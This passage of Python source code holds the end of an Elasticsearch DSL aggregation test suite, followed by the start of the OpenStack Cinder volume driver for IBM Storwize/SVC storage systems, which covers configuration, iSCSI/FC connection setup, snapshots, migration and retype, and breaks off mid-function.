with raises(Exception):
aggs.A(a, field='score')
def test_buckets_are_nestable():
a = aggs.Terms(field='tags')
b = a.bucket('per_author', 'terms', field='author.raw')
assert isinstance(b, aggs.Terms)
assert b._params == {'field': 'author.raw'}
assert a.aggs == {'per_author': b}
def test_metric_inside_buckets():
a = aggs.Terms(field='tags')
b = a.metric('max_score', 'max', field='score')
# returns bucket so it's chainable
assert a is b
assert a.aggs['max_score'] == aggs.Max(field='score')
def test_buckets_equals_counts_subaggs():
a = aggs.Terms(field='tags')
a.bucket('per_author', 'terms', field='author.raw')
b = aggs.Terms(field='tags')
assert a != b
def test_buckets_to_dict():
a = aggs.Terms(field='tags')
a.bucket('per_author', 'terms', field='author.raw')
assert {
'terms': {'field': 'tags'},
'aggs': {'per_author': {'terms': {'field': 'author.raw'}}},
} == a.to_dict()
a = aggs.Terms(field='tags')
a.metric('max_score', 'max', field='score')
assert {
'terms': {'field': 'tags'},
'aggs': {'max_score': {'max': {'field': 'score'}}},
} == a.to_dict()
def test_nested_buckets_are_reachable_as_getitem():
a = aggs.Terms(field='tags')
b = a.bucket('per_author', 'terms', field='author.raw')
assert a['per_author'] is not b
assert a['per_author'] == b
def test_nested_buckets_are_settable_as_getitem():
a = aggs.Terms(field='tags')
b = a['per_author'] = aggs.A('terms', field='author.raw')
assert a.aggs['per_author'] is b
def test_filter_can_be_instantiated_using_positional_args():
a = aggs.Filter(query.Q('term', f=42))
assert {
'filter': {
'term': {'f': 42}
}
} == a.to_dict()
assert a == aggs.A('filter', query.Q('term', f=42))
def test_filter_aggregation_as_nested_agg():
a = aggs.Terms(field='tags')
a.bucket('filtered', 'filter', query.Q('term', f=42))
assert {
'terms': {'field': 'tags'},
'aggs': {
'filtered': {
'filter': {
'term': {'f': 42}
},
}
}
} == a.to_dict()
def test_filter_aggregation_with_nested_aggs():
a = aggs.Filter(query.Q('term', f=42))
a.bucket('testing', 'terms', field='tags')
assert {
'filter': {
'term': {'f': 42}
},
'aggs': {
'testing': {'terms': {'field': 'tags'}}
}
} == a.to_dict()
def test_filters_correctly_identifies_the_hash():
a = aggs.A('filters', filters={'group_a': {'term': {'group': 'a'}}, 'group_b': {'term': {'group': 'b'}}})
assert {
'filters': {
'filters': {
'group_a': {'term': {'group': 'a'}},
'group_b': {'term': {'group': 'b'}}
}
}
} == a.to_dict()
assert a.filters.group_a == query.Q('term', group='a')
def test_bucket_sort_agg():
bucket_sort_agg = aggs.BucketSort(
sort=[{"total_sales": {"order": "desc"}}],
size=3
)
assert bucket_sort_agg.to_dict() == {
"bucket_sort": {
"sort": [
{"total_sales": {"order": "desc"}}
],
"size": 3
}
}
a = aggs.DateHistogram(field='date', interval='month')
a.bucket('total_sales', 'sum', field='price')
a.bucket(
'sales_bucket_sort',
'bucket_sort',
sort=[{"total_sales": {"order": "desc"}}],
size=3
)
assert {
"date_histogram": {
"field": "date",
"interval": "month"
},
"aggs": {
"total_sales": {
"sum": {
"field": "price"
}
},
"sales_bucket_sort": {
"bucket_sort": {
"sort": [
{"total_sales": {"order": "desc"}}
],
"size": 3
}
}
}
} == a.to_dict()
def test_bucket_sort_agg_only_trnunc():
bucket_sort_agg = aggs.BucketSort(**{'from': 1, 'size': 1})
assert bucket_sort_agg.to_dict() == {
"bucket_sort": {
"from": 1,
"size": 1
}
}
a = aggs.DateHistogram(field='date', interval='month')
a.bucket('bucket_truncate', 'bucket_sort', **{'from': 1, 'size': 1})
assert {
"date_histogram": {
"field": "date",
"interval": "month"
},
"aggs": {
"bucket_truncate": {
"bucket_sort": {
"from": 1,
"size": 1
}
}
}
} == a.to_dict()
|
|
# Copyright 2013 IBM Corp.
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""
Volume driver for IBM Storwize family and SVC storage systems.
Notes:
1. If you specify both a password and a key file, this driver will use the
key file only.
2. When using a key file for authentication, it is up to the user or
system administrator to store the private key in a safe manner.
3. The defaults for creating volumes are "-rsize 2% -autoexpand
-grainsize 256 -warning 0". These can be changed in the configuration
file or by using volume types(recommended only for advanced users).
Limitations:
1. The driver expects CLI output in English, error messages may be in a
localized format.
2. Clones and creating volumes from snapshots, where the source and target
are of different sizes, is not supported.
"""
import math
from oslo.config import cfg
from cinder import context
from cinder import exception
from cinder.openstack.common import excutils
from cinder.openstack.common import log as logging
from cinder.openstack.common import loopingcall
from cinder import units
from cinder import utils
from cinder.volume.drivers.ibm.storwize_svc import helpers as storwize_helpers
from cinder.volume.drivers.san import san
from cinder.volume import volume_types
LOG = logging.getLogger(__name__)
storwize_svc_opts = [
cfg.StrOpt('storwize_svc_volpool_name',
default='volpool',
help='Storage system storage pool for volumes'),
cfg.IntOpt('storwize_svc_vol_rsize',
default=2,
help='Storage system space-efficiency parameter for volumes '
'(percentage)'),
cfg.IntOpt('storwize_svc_vol_warning',
default=0,
help='Storage system threshold for volume capacity warnings '
'(percentage)'),
cfg.BoolOpt('storwize_svc_vol_autoexpand',
default=True,
help='Storage system autoexpand parameter for volumes '
'(True/False)'),
cfg.IntOpt('storwize_svc_vol_grainsize',
default=256,
help='Storage system grain size parameter for volumes '
'(32/64/128/256)'),
cfg.BoolOpt('storwize_svc_vol_compression',
default=False,
help='Storage system compression option for volumes'),
cfg.BoolOpt('storwize_svc_vol_easytier',
default=True,
help='Enable Easy Tier for volumes'),
cfg.IntOpt('storwize_svc_vol_iogrp',
default=0,
help='The I/O group in which to allocate volumes'),
cfg.IntOpt('storwize_svc_flashcopy_timeout',
default=120,
help='Maximum number of seconds to wait for FlashCopy to be '
'prepared. Maximum value is 600 seconds (10 minutes)'),
cfg.StrOpt('storwize_svc_connection_protocol',
default='iSCSI',
help='Connection protocol (iSCSI/FC)'),
cfg.BoolOpt('storwize_svc_iscsi_chap_enabled',
default=True,
help='Configure CHAP authentication for iSCSI connections '
'(Default: Enabled)'),
cfg.BoolOpt('storwize_svc_multipath_enabled',
default=False,
help='Connect with multipath (FC only; iSCSI multipath is '
'controlled by Nova)'),
cfg.BoolOpt('storwize_svc_multihostmap_enabled',
default=True,
help='Allows vdisk to multi host mapping'),
]
CONF = cfg.CONF
CONF.register_opts(storwize_svc_opts)
class StorwizeSVCDriver(san.SanDriver):
"""IBM Storwize V7000 and SVC iSCSI/FC volume driver.
Version history:
1.0 - Initial driver
1.1 - FC support, create_cloned_volume, volume type support,
get_volume_stats, minor bug fixes
1.2.0 - Added retype
1.2.1 - Code refactor, improved exception handling
1.2.2 - Fix bug #1274123 (races in host-related functions)
1.2.3 - Fix Fibre Channel connectivity: bug #1279758 (add delim to
lsfabric, clear unused data from connections, ensure matching
WWPNs by comparing lower case
1.2.4 - Fix bug #1278035 (async migration/retype)
1.2.5 - Added support for manage_existing (unmanage is inherited)
"""
VERSION = "1.2.5"
VDISKCOPYOPS_INTERVAL = 600
def __init__(self, *args, **kwargs):
super(StorwizeSVCDriver, self).__init__(*args, **kwargs)
self.configuration.append_config_values(storwize_svc_opts)
self._helpers = storwize_helpers.StorwizeHelpers(self._run_ssh)
self._vdiskcopyops = {}
self._vdiskcopyops_loop = None
self._state = {'storage_nodes': {},
'enabled_protocols': set(),
'compression_enabled': False,
'available_iogrps': [],
'system_name': None,
'system_id': None,
'code_level': None,
}
def do_setup(self, ctxt):
"""Check that we have all configuration details from the storage."""
LOG.debug(_('enter: do_setup'))
# Get storage system name, id, and code level
self._state.update(self._helpers.get_system_info())
# Validate that the pool exists
pool = self.configuration.storwize_svc_volpool_name
try:
self._helpers.get_pool_attrs(pool)
except exception.VolumeBackendAPIException:
msg = _('Failed getting details for pool %s') % pool
raise exception.InvalidInput(reason=msg)
# Check if compression is supported
self._state['compression_enabled'] = \
self._helpers.compression_enabled()
# Get the available I/O groups
self._state['available_iogrps'] = \
self._helpers.get_available_io_groups()
# Get the iSCSI and FC names of the Storwize/SVC nodes
self._state['storage_nodes'] = self._helpers.get_node_info()
# Add the iSCSI IP addresses and WWPNs to the storage node info
self._helpers.add_iscsi_ip_addrs(self._state['storage_nodes'])
self._helpers.add_fc_wwpns(self._state['storage_nodes'])
# For each node, check what connection modes it supports. Delete any
# nodes that do not support any types (may be partially configured).
to_delete = []
for k, node in self._state['storage_nodes'].iteritems():
if ((len(node['ipv4']) or len(node['ipv6']))
and len(node['iscsi_name'])):
node['enabled_protocols'].append('iSCSI')
self._state['enabled_protocols'].add('iSCSI')
if len(node['WWPN']):
node['enabled_protocols'].append('FC')
self._state['enabled_protocols'].add('FC')
if not len(node['enabled_protocols']):
to_delete.append(k)
for delkey in to_delete:
del self._state['storage_nodes'][delkey]
# Make sure we have at least one node configured
if not len(self._state['storage_nodes']):
msg = _('do_setup: No configured nodes.')
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
# Build the list of in-progress vdisk copy operations
if ctxt is None:
admin_context = context.get_admin_context()
else:
admin_context = ctxt.elevated()
volumes = self.db.volume_get_all_by_host(admin_context, self.host)
for volume in volumes:
metadata = self.db.volume_admin_metadata_get(admin_context,
volume['id'])
curr_ops = metadata.get('vdiskcopyops', None)
if curr_ops:
ops = [tuple(x.split(':')) for x in curr_ops.split(';')]
self._vdiskcopyops[volume['id']] = ops
# if vdiskcopy exists in database, start the looping call
if len(self._vdiskcopyops) >= 1:
self._vdiskcopyops_loop = loopingcall.LoopingCall(
self._check_volume_copy_ops)
self._vdiskcopyops_loop.start(interval=self.VDISKCOPYOPS_INTERVAL)
LOG.debug(_('leave: do_setup'))
def check_for_setup_error(self):
"""Ensure that the flags are set properly."""
LOG.debug(_('enter: check_for_setup_error'))
# Check that we have the system ID information
if self._state['system_name'] is None:
exception_msg = (_('Unable to determine system name'))
raise exception.VolumeBackendAPIException(data=exception_msg)
if self._state['system_id'] is None:
exception_msg = (_('Unable to determine system id'))
raise exception.VolumeBackendAPIException(data=exception_msg)
required_flags = ['san_ip', 'san_ssh_port', 'san_login',
'storwize_svc_volpool_name']
for flag in required_flags:
if not self.configuration.safe_get(flag):
raise exception.InvalidInput(reason=_('%s is not set') % flag)
# Ensure that either password or keyfile were set
if not (self.configuration.san_password or
self.configuration.san_private_key):
raise exception.InvalidInput(
reason=_('Password or SSH private key is required for '
'authentication: set either san_password or '
'san_private_key option'))
# Check that flashcopy_timeout is not more than 10 minutes
flashcopy_timeout = self.configuration.storwize_svc_flashcopy_timeout
if not (flashcopy_timeout > 0 and flashcopy_timeout <= 600):
raise exception.InvalidInput(
reason=_('Illegal value %d specified for '
'storwize_svc_flashcopy_timeout: '
'valid values are between 0 and 600')
% flashcopy_timeout)
opts = self._helpers.build_default_opts(self.configuration)
self._helpers.check_vdisk_opts(self._state, opts)
LOG.debug(_('leave: check_for_setup_error'))
def ensure_export(self, ctxt, volume):
"""Check that the volume exists on the storage.
The system does not "export" volumes as a Linux iSCSI target does,
and therefore we just check that the volume exists on the storage.
"""
volume_defined = self._helpers.is_vdisk_defined(volume['name'])
if not volume_defined:
LOG.error(_('ensure_export: Volume %s not found on storage')
% volume['name'])
def create_export(self, ctxt, volume):
model_update = None
return model_update
def remove_export(self, ctxt, volume):
pass
def validate_connector(self, connector):
"""Check connector for at least one enabled protocol (iSCSI/FC)."""
valid = False
if ('iSCSI' in self._state['enabled_protocols'] and
'initiator' in connector):
valid = True
if 'FC' in self._state['enabled_protocols'] and 'wwpns' in connector:
valid = True
if not valid:
msg = (_('The connector does not contain the required '
'information.'))
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
def _get_vdisk_params(self, type_id, volume_type=None):
return self._helpers.get_vdisk_params(self.configuration, self._state,
type_id, volume_type=volume_type)
@utils.synchronized('storwize-host', external=True)
def initialize_connection(self, volume, connector):
"""Perform the necessary work so that an iSCSI/FC connection can
be made.
To be able to create an iSCSI/FC connection from a given host to a
volume, we must:
1. Translate the given iSCSI name or WWNN to a host name
2. Create new host on the storage system if it does not yet exist
3. Map the volume to the host if it is not already done
4. Return the connection information for relevant nodes (in the
proper I/O group)
"""
LOG.debug(_('enter: initialize_connection: volume %(vol)s with '
'connector %(conn)s') % {'vol': volume, 'conn': connector})
vol_opts = self._get_vdisk_params(volume['volume_type_id'])
volume_name = volume['name']
# Delete irrelevant connection information that later could result
# in unwanted behaviour. For example, if FC is used yet the hosts
# return iSCSI data, the driver will try to create the iSCSI connection
# which can result in a nice error about reaching the per-host maximum
# iSCSI initiator limit.
# First make a copy so we don't mess with a caller's connector.
connector = connector.copy()
if vol_opts['protocol'] == 'FC':
connector.pop('initiator', None)
elif vol_opts['protocol'] == 'iSCSI':
connector.pop('wwnns', None)
connector.pop('wwpns', None)
# Check if a host object is defined for this host name
host_name = self._helpers.get_host_from_connector(connector)
if host_name is None:
# Host does not exist - add a new host to Storwize/SVC
host_name = self._helpers.create_host(connector)
if vol_opts['protocol'] == 'iSCSI':
chap_secret = self._helpers.get_chap_secret_for_host(host_name)
chap_enabled = self.configuration.storwize_svc_iscsi_chap_enabled
if chap_enabled and chap_secret is None:
chap_secret = self._helpers.add_chap_secret_to_host(host_name)
elif not chap_enabled and chap_secret:
LOG.warning(_('CHAP secret exists for host but CHAP is '
'disabled'))
volume_attributes = self._helpers.get_vdisk_attributes(volume_name)
if volume_attributes is None:
msg = (_('initialize_connection: Failed to get attributes'
' for volume %s') % volume_name)
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
multihostmap = self.configuration.storwize_svc_multihostmap_enabled
lun_id = self._helpers.map_vol_to_host(volume_name, host_name,
multihostmap)
try:
preferred_node = volume_attributes['preferred_node_id']
IO_group = volume_attributes['IO_group_id']
except KeyError as e:
LOG.error(_('Did not find expected column name in '
'lsvdisk: %s') % e)
msg = (_('initialize_connection: Missing volume '
'attribute for volume %s') % volume_name)
raise exception.VolumeBackendAPIException(data=msg)
try:
# Get preferred node and other nodes in I/O group
preferred_node_entry = None
io_group_nodes = []
for node in self._state['storage_nodes'].itervalues():
if vol_opts['protocol'] not in node['enabled_protocols']:
continue
if node['id'] == preferred_node:
preferred_node_entry = node
if node['IO_group'] == IO_group:
io_group_nodes.append(node)
if not len(io_group_nodes):
msg = (_('initialize_connection: No node found in '
'I/O group %(gid)s for volume %(vol)s') %
{'gid': IO_group, 'vol': volume_name})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
if not preferred_node_entry and not vol_opts['multipath']:
# Get 1st node in I/O group
preferred_node_entry = io_group_nodes[0]
LOG.warn(_('initialize_connection: Did not find a preferred '
'node for volume %s') % volume_name)
properties = {}
properties['target_discovered'] = False
properties['target_lun'] = lun_id
properties['volume_id'] = volume['id']
if vol_opts['protocol'] == 'iSCSI':
type_str = 'iscsi'
if len(preferred_node_entry['ipv4']):
ipaddr = preferred_node_entry['ipv4'][0]
else:
ipaddr = preferred_node_entry['ipv6'][0]
properties['target_portal'] = '%s:%s' % (ipaddr, '3260')
properties['target_iqn'] = preferred_node_entry['iscsi_name']
if chap_secret:
properties['auth_method'] = 'CHAP'
properties['auth_username'] = connector['initiator']
properties['auth_password'] = chap_secret
else:
type_str = 'fibre_channel'
conn_wwpns = self._helpers.get_conn_fc_wwpns(host_name)
if len(conn_wwpns) == 0:
msg = (_('Could not get FC connection information for the '
'host-volume connection. Is the host configured '
'properly for FC connections?'))
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
if not vol_opts['multipath']:
# preferred_node_entry can have a list of WWPNs while only
# one WWPN may be available on the storage host. Here we
# walk through the nodes until we find one that works,
# default to the first WWPN otherwise.
for WWPN in preferred_node_entry['WWPN']:
if WWPN in conn_wwpns:
properties['target_wwn'] = WWPN
break
else:
LOG.warning(_('Unable to find a preferred node match '
'for node %(node)s in the list of '
'available WWPNs on %(host)s. '
'Using first available.') %
{'node': preferred_node,
'host': host_name})
properties['target_wwn'] = conn_wwpns[0]
else:
properties['target_wwn'] = conn_wwpns
i_t_map = self._make_initiator_target_map(connector['wwpns'],
conn_wwpns)
properties['initiator_target_map'] = i_t_map
except Exception:
with excutils.save_and_reraise_exception():
self.terminate_connection(volume, connector)
LOG.error(_('initialize_connection: Failed to collect return '
'properties for volume %(vol)s and connector '
'%(conn)s.\n') % {'vol': volume,
'conn': connector})
LOG.debug(_('leave: initialize_connection:\n volume: %(vol)s\n '
'connector %(conn)s\n properties: %(prop)s')
% {'vol': volume, 'conn': connector, 'prop': properties})
return {'driver_volume_type': type_str, 'data': properties, }
def _make_initiator_target_map(self, initiator_wwpns, target_wwpns):
"""Build a simplistic all-to-all mapping."""
i_t_map = {}
for i_wwpn in initiator_wwpns:
i_t_map[str(i_wwpn)] = []
for t_wwpn in target_wwpns:
i_t_map[i_wwpn].append(t_wwpn)
return i_t_map
@utils.synchronized('storwize-host', external=True)
def terminate_connection(self, volume, connector, **kwargs):
"""Cleanup after an iSCSI connection has been terminated.
When we clean up a terminated connection between a given connector
and volume, we:
1. Translate the given connector to a host name
2. Remove the volume-to-host mapping if it exists
3. Delete the host if it has no more mappings (hosts are created
automatically by this driver when mappings are created)
"""
LOG.debug(_('enter: terminate_connection: volume %(vol)s with '
'connector %(conn)s') % {'vol': volume, 'conn': connector})
vol_name = volume['name']
if 'host' in connector:
# maybe two hosts on the storage, one is for FC and the other for
# iSCSI, so get host according to protocol
vol_opts = self._get_vdisk_params(volume['volume_type_id'])
connector = connector.copy()
if vol_opts['protocol'] == 'FC':
connector.pop('initiator', None)
elif vol_opts['protocol'] == 'iSCSI':
connector.pop('wwnns', None)
connector.pop('wwpns', None)
host_name = self._helpers.get_host_from_connector(connector)
if host_name is None:
msg = (_('terminate_connection: Failed to get host name from'
' connector.'))
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
else:
# See bug #1244257
host_name = None
info = {}
if 'wwpns' in connector and host_name:
target_wwpns = self._helpers.get_conn_fc_wwpns(host_name)
init_targ_map = self._make_initiator_target_map(connector['wwpns'],
target_wwpns)
info = {'driver_volume_type': 'fibre_channel',
'data': {'initiator_target_map': init_targ_map}}
self._helpers.unmap_vol_from_host(vol_name, host_name)
LOG.debug(_('leave: terminate_connection: volume %(vol)s with '
'connector %(conn)s') % {'vol': volume, 'conn': connector})
return info
def create_volume(self, volume):
opts = self._get_vdisk_params(volume['volume_type_id'])
pool = self.configuration.storwize_svc_volpool_name
return self._helpers.create_vdisk(volume['name'], str(volume['size']),
'gb', pool, opts)
def delete_volume(self, volume):
self._helpers.delete_vdisk(volume['name'], False)
if volume['id'] in self._vdiskcopyops:
del self._vdiskcopyops[volume['id']]
if not len(self._vdiskcopyops):
self._vdiskcopyops_loop.stop()
self._vdiskcopyops_loop = None
def create_snapshot(self, snapshot):
ctxt = context.get_admin_context()
try:
source_vol = self.db.volume_get(ctxt, snapshot['volume_id'])
except Exception:
msg = (_('create_snapshot: get source volume failed.'))
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
opts = self._get_vdisk_params(source_vol['volume_type_id'])
self._helpers.create_copy(snapshot['volume_name'], snapshot['name'],
snapshot['volume_id'], self.configuration,
opts, False)
def delete_snapshot(self, snapshot):
self._helpers.delete_vdisk(snapshot['name'], False)
def create_volume_from_snapshot(self, volume, snapshot):
if volume['size'] != snapshot['volume_size']:
msg = (_('create_volume_from_snapshot: Source and destination '
'size differ.'))
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
opts = self._get_vdisk_params(volume['volume_type_id'])
self._helpers.create_copy(snapshot['name'], volume['name'],
snapshot['id'], self.configuration,
opts, True)
def create_cloned_volume(self, tgt_volume, src_volume):
if src_volume['size'] != tgt_volume['size']:
msg = (_('create_cloned_volume: Source and destination '
'size differ.'))
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
opts = self._get_vdisk_params(tgt_volume['volume_type_id'])
self._helpers.create_copy(src_volume['name'], tgt_volume['name'],
src_volume['id'], self.configuration,
opts, True)
def extend_volume(self, volume, new_size):
LOG.debug(_('enter: extend_volume: volume %s') % volume['id'])
ret = self._helpers.ensure_vdisk_no_fc_mappings(volume['name'],
allow_snaps=False)
if not ret:
msg = (_('extend_volume: Extending a volume with snapshots is not '
'supported.'))
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
extend_amt = int(new_size) - volume['size']
self._helpers.extend_vdisk(volume['name'], extend_amt)
LOG.debug(_('leave: extend_volume: volume %s') % volume['id'])
def _add_vdisk_copy_op(self, ctxt, volume, new_op):
metadata = self.db.volume_admin_metadata_get(ctxt.elevated(),
volume['id'])
curr_ops = metadata.get('vdiskcopyops', None)
if curr_ops:
curr_ops_list = [tuple(x.split(':')) for x in curr_ops.split(';')]
new_ops_list = curr_ops_list.append(new_op)
else:
new_ops_list = [new_op]
new_ops_str = ';'.join([':'.join(x) for x in new_ops_list])
self.db.volume_admin_metadata_update(ctxt.elevated(), volume['id'],
{'vdiskcopyops': new_ops_str},
False)
if volume['id'] in self._vdiskcopyops:
self._vdiskcopyops[volume['id']].append(new_op)
else:
self._vdiskcopyops[volume['id']] = [new_op]
# We added the first copy operation, so start the looping call
if len(self._vdiskcopyops) == 1:
self._vdiskcopyops_loop = loopingcall.LoopingCall(
self._check_volume_copy_ops)
self._vdiskcopyops_loop.start(interval=self.VDISKCOPYOPS_INTERVAL)
def _rm_vdisk_copy_op(self, ctxt, volume, orig_copy_id, new_copy_id):
try:
self._vdiskcopyops[volume['id']].remove((orig_copy_id,
new_copy_id))
if not len(self._vdiskcopyops[volume['id']]):
del self._vdiskcopyops[volume['id']]
if not len(self._vdiskcopyops):
self._vdiskcopyops_loop.stop()
self._vdiskcopyops_loop = None
except IndexError:
msg = (_('_rm_vdisk_copy_op: Volume %s does not have any '
'registered vdisk copy operations.') % volume['id'])
LOG.error(msg)
return
except ValueError:
msg = (_('_rm_vdisk_copy_op: Volume %(vol)s does not have the '
'specified vdisk copy operation: orig=%(orig)s '
'new=%(new)s.')
% {'vol': volume['id'], 'orig': orig_copy_id,
'new': new_copy_id})
LOG.error(msg)
return
metadata = self.db.volume_admin_metadata_get(ctxt.elevated(),
volume['id'])
curr_ops = metadata.get('vdiskcopyops', None)
if not curr_ops:
msg = (_('_rm_vdisk_copy_op: Volume metadata %s does not have any '
'registered vdisk copy operations.') % volume['id'])
LOG.error(msg)
return
curr_ops_list = [tuple(x.split(':')) for x in curr_ops.split(';')]
try:
curr_ops_list.remove((orig_copy_id, new_copy_id))
except ValueError:
msg = (_('_rm_vdisk_copy_op: Volume %(vol)s metadata does not '
'have the specified vdisk copy operation: orig=%(orig)s '
'new=%(new)s.')
% {'vol': volume['id'], 'orig': orig_copy_id,
'new': new_copy_id})
LOG.error(msg)
return
if len(curr_ops_list):
new_ops_str = ';'.join([':'.join(x) for x in curr_ops_list])
self.db.volume_admin_metadata_update(ctxt.elevated(), volume['id'],
{'vdiskcopyops': new_ops_str},
False)
else:
self.db.volume_admin_metadata_delete(ctxt.elevated(), volume['id'],
'vdiskcopyops')
def _check_volume_copy_ops(self):
LOG.debug(_("enter: update volume copy status"))
ctxt = context.get_admin_context()
copy_items = self._vdiskcopyops.items()
for vol_id, copy_ops in copy_items:
try:
volume = self.db.volume_get(ctxt, vol_id)
except Exception:
LOG.warn(_('Volume %s does not exist.'), vol_id)
del self._vdiskcopyops[vol_id]
if not len(self._vdiskcopyops):
self._vdiskcopyops_loop.stop()
self._vdiskcopyops_loop = None
continue
for copy_op in copy_ops:
try:
synced = self._helpers.is_vdisk_copy_synced(volume['name'],
copy_op[1])
except Exception:
msg = (_('_check_volume_copy_ops: Volume %(vol)s does not '
'have the specified vdisk copy operation: '
'orig=%(orig)s new=%(new)s.')
% {'vol': volume['id'], 'orig': copy_op[0],
'new': copy_op[1]})
LOG.info(msg)
else:
if synced:
self._helpers.rm_vdisk_copy(volume['name'], copy_op[0])
self._rm_vdisk_copy_op(ctxt, volume, copy_op[0],
copy_op[1])
LOG.debug(_("exit: update volume copy status"))
def migrate_volume(self, ctxt, volume, host):
"""Migrate directly if source and dest are managed by same storage.
We create a new vdisk copy in the desired pool, and add the original
vdisk copy to the admin_metadata of the volume to be deleted. The
deletion will occur using a periodic task once the new copy is synced.
:param ctxt: Context
:param volume: A dictionary describing the volume to migrate
:param host: A dictionary describing the host to migrate to, where
host['host'] is its name, and host['capabilities'] is a
dictionary of its reported capabilities.
"""
LOG.debug(_('enter: migrate_volume: id=%(id)s, host=%(host)s') %
{'id': volume['id'], 'host': host['host']})
false_ret = (False, None)
dest_pool = self._helpers.can_migrate_to_host(host, self._state)
if dest_pool is None:
return false_ret
ctxt = context.get_admin_context()
if volume['volume_type_id'] is not None:
volume_type_id = volume['volume_type_id']
vol_type = volume_types.get_volume_type(ctxt, volume_type_id)
else:
vol_type = None
self._check_volume_copy_ops()
new_op = self._helpers.add_vdisk_copy(volume['name'], dest_pool,
vol_type, self._state,
self.configuration)
self._add_vdisk_copy_op(ctxt, volume, new_op)
LOG.debug(_('leave: migrate_volume: id=%(id)s, host=%(host)s') %
{'id': volume['id'], 'host': host['host']})
return (True, None)
def retype(self, ctxt, volume, new_type, diff, host):
"""Convert the volume to be of the new type.
Returns a boolean indicating whether the retype occurred.
:param ctxt: Context
:param volume: A dictionary describing the volume to migrate
:param new_type: A dictionary describing the volume type to convert to
:param diff: A dictionary with the difference between the two types
:param host: A dictionary describing the host to migrate to, where
host['host'] is its name, and host['capabilities'] is a
dictionary of its reported capabilities.
"""
def retype_iogrp_property(volume, new, old):
if new != old:
self._helpers.change_vdisk_iogrp(volume['name'],
self._state, (new, old))
LOG.debug(_('enter: retype: id=%(id)s, new_type=%(new_type)s,'
'diff=%(diff)s, host=%(host)s') % {'id': volume['id'],
'new_type': new_type,
'diff': diff,
'host': host})
ignore_keys = ['protocol', 'multipath']
no_copy_keys = ['warning', 'autoexpand', 'easytier']
copy_keys = ['rsize', 'grainsize', 'compression']
all_keys = ignore_keys + no_copy_keys + copy_keys
old_opts = self._get_vdisk_params(volume['volume_type_id'])
new_opts = self._get_vdisk_params(new_type['id'],
volume_type=new_type)
vdisk_changes = []
need_copy = False
for key in all_keys:
if old_opts[key] != new_opts[key]:
if key in copy_keys:
need_copy = True
break
elif key in no_copy_keys:
vdisk_changes.append(key)
dest_location = host['capabilities'].get('location_info')
if self._stats['location_info'] != dest_location:
need_copy = True
if need_copy:
self._check_volume_copy_ops()
dest_pool = self._helpers.can_migrate_to_host(host, self._state)
if dest_pool is None:
return False
retype_iogrp_property(volume, new_opts['iogrp'], old_opts['iogrp'])
try:
new = self._helpers.add_vdisk_copy(volume['name'], dest_pool,
new_type, self._state,
self.configuration)
self._add_vdisk_copy_op(ctxt, volume, new)
except exception.VolumeDriverException:
# roll back changing iogrp property
retype_iogrp_property(volume, old_opts['iogrp'],
new_opts['iogrp'])
msg = (_('Unable to retype: A copy of volume %s exists. '
'Retyping would exceed the limit of 2 copies.'),
volume['id'])
raise exception.VolumeDriverException(message=msg)
else:
retype_iogrp_property(volume, new_opts['iogrp'], old_opts['iogrp'])
self._helpers.change_vdisk_options(volume['name'], vdisk_changes,
new_opts, self._state)
LOG.debug(_('exit: retype: ild=%(id)s, new_type=%(new_type)s,'
'diff=%(diff)s, host=%(host)s') % {'id': volume['id'],
'new_type': new_type,
'diff': diff,
'host': host['host']})
return True
def manage_existing(self, volume, ref):
"""Manages an existing vdisk.
Renames the vdisk to match the expected name for the volume.
Error checking done by manage_existing_get_size is not repeated -
if we got here then we have a vdisk that isn't in use (or we don't
care if it is in use.
"""
vdisk = self._helpers.vdisk_by_uid(ref['vdisk_UID'])
if vdisk is None:
reason = _('No vdisk with the specified vdisk_UID.')
raise exception.ManageExistingInvalidReference(existing_ref=ref,
reason=reason)
self._helpers.rename_vdisk(vdisk['name'], volume['name'])
def manage_existing_get_size(self, volume, ref):
"""Return size of an existing LV for manage_existing.
existing_ref is a dictionary of the form:
{'vdisk_UID': <uid of disk>}
Optional elements are:
'manage_if_in_use': True/False (default is False)
If set to True, a volume will be managed even if it is currently
attached to a host system.
"""
# Check that the reference is valid
if 'vdisk_UID' not in ref:
reason = _('Reference must contain vdisk_UID element.')
raise exception.ManageExistingInvalidReference(existing_ref=ref,
reason=reason)
# Check for existence of the vdisk
vdisk = self._helpers.vdisk_by_uid(ref['vdisk_UID'])
if vdisk is None:
reason = _('No vdisk with the specified vdisk_UID.')
raise exception.ManageExistingInvalidReference(existing_ref=ref,
reason=reason)
# Check if the disk is in use, if we need to.
manage_if_in_use = ref.get('manage_if_in_use', False)
if (not manage_if_in_use and
self._helpers.is_vdisk_in_use(vdisk['name'])):
reason = _('The specified vdisk is mapped to a host.')
raise exception.ManageExistingInvalidReference(existing_ref=ref,
reason=reason)
return int(math.ceil(float(vdisk['capacity']) / units.GiB))
def get_volume_stats(self, refresh=False):
"""Get volume stats.
If we haven't gotten stats yet or 'refresh' is True,
run update the stats first.
"""
if not self._stats or refresh:
self._update_volume_stats()
return self._stats
def _update_volume_stats(self):
"""Retrieve stats info from volume group."""
LOG.debug(_("Updating volume stats"))
data = {}
data['vendor_name'] = 'IBM'
data['driver_version'] = self.VERSION
data['storage_protocol'] = list(self._state['enabled_protocols'])
data['total_capacity_gb'] = 0 # To be overwritten
data['free_capacity_gb'] = 0 # To be overwritten
data['reserved_percentage'] = self.configuration.reserved_percentage
data['QoS_support'] = False
pool = self.configuration.storwize_svc_volpool_name
backend_name = self.configuration.safe_get('volume_backend_name')
if not backend_name:
backend_name = '%s_%s' % (self._state['system_name'], pool)
data['volume_backend_name'] = backend_name
attributes = self._helpers.get_pool_attrs(pool)
if not attributes:
